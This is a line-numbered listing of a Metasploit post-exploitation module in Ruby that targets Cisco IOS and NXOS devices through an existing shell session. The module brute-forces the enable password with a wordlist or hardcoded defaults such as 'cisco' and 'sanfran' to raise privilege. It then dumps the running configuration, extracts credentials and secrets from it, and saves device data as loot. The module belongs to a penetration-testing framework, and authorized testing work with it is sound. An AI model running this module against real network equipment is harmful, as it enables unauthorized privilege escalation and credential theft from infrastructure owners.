Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Cisco
8
  include Msf::Exploit::Deprecated
9
  moved_from 'post/cisco/gather/enum_cisco'
10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Cisco Gather Device General Information',
15
        'Description' => %q{
16
          This module collects a Cisco IOS or NXOS device information and configuration.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
20
        'Platform' => [ 'cisco'],
21
        'SessionTypes' => [ 'shell' ],
22
        'Notes' => {
23
          'Stability' => [CRASH_SAFE],
24
          'SideEffects' => [IOC_IN_LOGS],
25
          'Reliability' => []
26
        }
27
      )
28
    )
29

30
    register_options(
31
      [
32
        OptString.new('ENABLE', [ false, 'Enable password for changing privilege level.']),
33
        OptPath.new('WORDLIST', [false, 'Wordlist of possible enable passwords to try.'])
34
      ]
35
    )
36
  end
37

38
  def run
39
    # Get device prompt
40
    prompt = session.shell_command('')
41

42
    # Set terminal length to 0 so no paging is required
43
    session.shell_write("term len 0 \n")
44

45
    # Get version info
46
    print_status('Getting version information')
47
    show_ver_cmd = 'show version'
48
    ver_out = session.shell_command(show_ver_cmd)
49
    ver = ver_out.gsub(/show version/, '')
50

51
    # Get current privilege level
52
    print_status('Getting privilege level')
53
    priv_cmd = 'show priv'
54
    priv = session.shell_command(priv_cmd).scan(/privilege level is (\d*)/).join
55

56
    # Check if this is a Nexus or IOS box
57
    case ver
58
    when /Nexus/
59
      os_type = 'Nexus'
60
      mode = 'EXEC'
61
    when /IOS/
62
      os_type = 'IOS'
63
    end
64
    if os_type == 'IOS'
65
      case prompt
66
      when />/
67
        mode = 'EXEC'
68
      when /#/
69
        mode = 'PRIV'
70
      end
71
    end
72

73
    print_status("The device OS is #{os_type}")
74
    print_status("Session running in mode #{mode}")
75
    print_status("Privilege level #{priv}")
76

77
    case os_type
78
    when /IOS/
79
      ver_loc = store_loot('cisco.ios.version',
80
                           'text/plain',
81
                           session,
82
                           ver.strip,
83
                           'version.txt',
84
                           'Cisco IOS Version')
85
    when /Nexus/
86
      ver_loc = store_loot('cisco.nxos.version',
87
                           'text/plain',
88
                           session,
89
                           ver.strip,
90
                           'version.txt',
91
                           'Cisco NXOS Version')
92
    end
93

94
    # Print the version of VERBOSE set to true.
95
    vprint_good("version information stored in to loot, file:#{ver_loc}")
96

97
    # Enumerate depending priv level
98
    case priv
99
    when '1'
100
      enum_exec(prompt)
101
      if get_enable(datastore['ENABLE'], datastore['WORDLIST'])
102
        enum_priv(prompt)
103
      end
104
    when /7|15/
105
      enum_exec(prompt)
106
      enum_priv(prompt)
107
    end
108
  end
109

110
  def get_enable(enable_pass, pass_file)
111
    if enable_pass
112
      found = false
113
      session.shell_command('enable').to_s.strip
114
      en_out = session.shell_command(enable_pass)
115
      if en_out =~ /Password:/
116
        print_error('Failed to change privilege level using provided Enable password.')
117
      else
118
        found = true
119
      end
120
    else
121
      if pass_file
122
        if !::File.exist?(pass_file)
123
          print_error("Wordlist File #{pass_file} does not exist!")
124
          return
125
        end
126
        creds = ::File.open(pass_file, 'rb')
127
      else
128
        creds = "Cisco\n" << "cisco\n" << "sanfran\n" << "SanFran\n" << "password\n" << "Password\n"
129
      end
130
      print_status('Trying to get higher privilege level with common Enable passwords..')
131

132
      # Try just the enable command
133
      en_out = session.shell_command('enable').to_s.strip
134
      if en_out =~ /Password:/
135
        creds.each_line do |p|
136
          next if p.strip.empty?
137
          next if p[0, 1] == '#'
138

139
          print_status("\tTrying password #{p.strip}")
140
          pass_out = session.shell_command(p.strip).to_s.strip
141
          vprint_status("Response: #{pass_out}")
142
          session.shell_command('enable').to_s.strip if pass_out =~ /Bad secrets/
143
          found = true if pass_out =~ /#/
144
          break if found
145
        end
146
      else
147
        found = true
148
      end
149
    end
150
    if found
151
      print_good('Obtained higher privilege level.')
152
      return true
153
    else
154
      print_error('Could not obtain higher privilege level.')
155
      return false
156
    end
157
  end
158

159
  # Run enumeration commands for when privilege level is 7 or 15
160
  def enum_priv(prompt)
161
    host = session.session_host
162
    port = session.session_port
163
    priv_commands = [
164
      {
165
        'cmd' => 'show run',
166
        'fn' => 'run_config',
167
        'desc' => 'Cisco Device running configuration'
168
      },
169
      {
170
        'cmd' => 'show cdp neigh',
171
        'fn' => 'cdp_neighbors',
172
        'desc' => 'Cisco Device CDP Neighbors'
173
      },
174
      {
175
        'cmd' => 'show lldp neigh',
176
        'fn' => 'cdp_neighbors',
177
        'desc' => 'Cisco Device LLDP Neighbors'
178
      }
179
    ]
180
    priv_commands.each do |ec|
181
      cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/, '')
182
      # also look at line number so we dont invalidate large outputs by something at the end
183
      next if cmd_out.split("\n").length < 2 && cmd_out =~ /Invalid input|%/
184

185
      print_status("Gathering info from #{ec['cmd']}")
186
      # Process configuration
187
      if ec['cmd'] =~ /show run/
188
        print_status('Parsing running configuration for credentials and secrets...')
189
        cisco_ios_config_eater(host, port, cmd_out)
190
      end
191
      cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
192
                           'text/plain',
193
                           session,
194
                           cmd_out.strip,
195
                           "#{ec['fn']}.txt",
196
                           ec['desc'])
197
      vprint_good("Saving to #{cmd_loc}")
198
    end
199
  end
200

201
  # run commands found in exec mode under privilege 1
202
  def enum_exec(prompt)
203
    exec_commands = [
204
      {
205
        'cmd' => 'show ssh',
206
        'fn' => 'ssh_sessions',
207
        'desc' => 'SSH Sessions on Cisco Device'
208
      },
209
      {
210
        'cmd' => 'show sessions',
211
        'fn' => 'telnet_sessions',
212
        'desc' => 'Telnet Sessions on Cisco Device'
213
      },
214
      {
215
        'cmd' => 'show login',
216
        'fn' => 'login_settings',
217
        'desc' => 'Login settings on Cisco Device'
218
      },
219
      {
220
        'cmd' => 'show ip interface brief',
221
        'fn' => 'interface_info',
222
        'desc' => 'IP Enabled Interfaces on Cisco Device'
223
      },
224
      {
225
        'cmd' => 'show inventory',
226
        'fn' => 'hw_inventory',
227
        'desc' => 'Hardware component inventory for Cisco Device'
228
      }
229
    ]
230
    exec_commands.each do |ec|
231
      cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/, '')
232
      next if cmd_out =~ /Invalid input|%/
233

234
      print_status("Gathering info from #{ec['cmd']}")
235
      cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
236
                           'text/plain',
237
                           session,
238
                           cmd_out.strip,
239
                           "#{ec['fn']}.txt",
240
                           ec['desc'])
241
      vprint_good("Saving to #{cmd_loc}")
242
    end
243
  end
244
end
245

246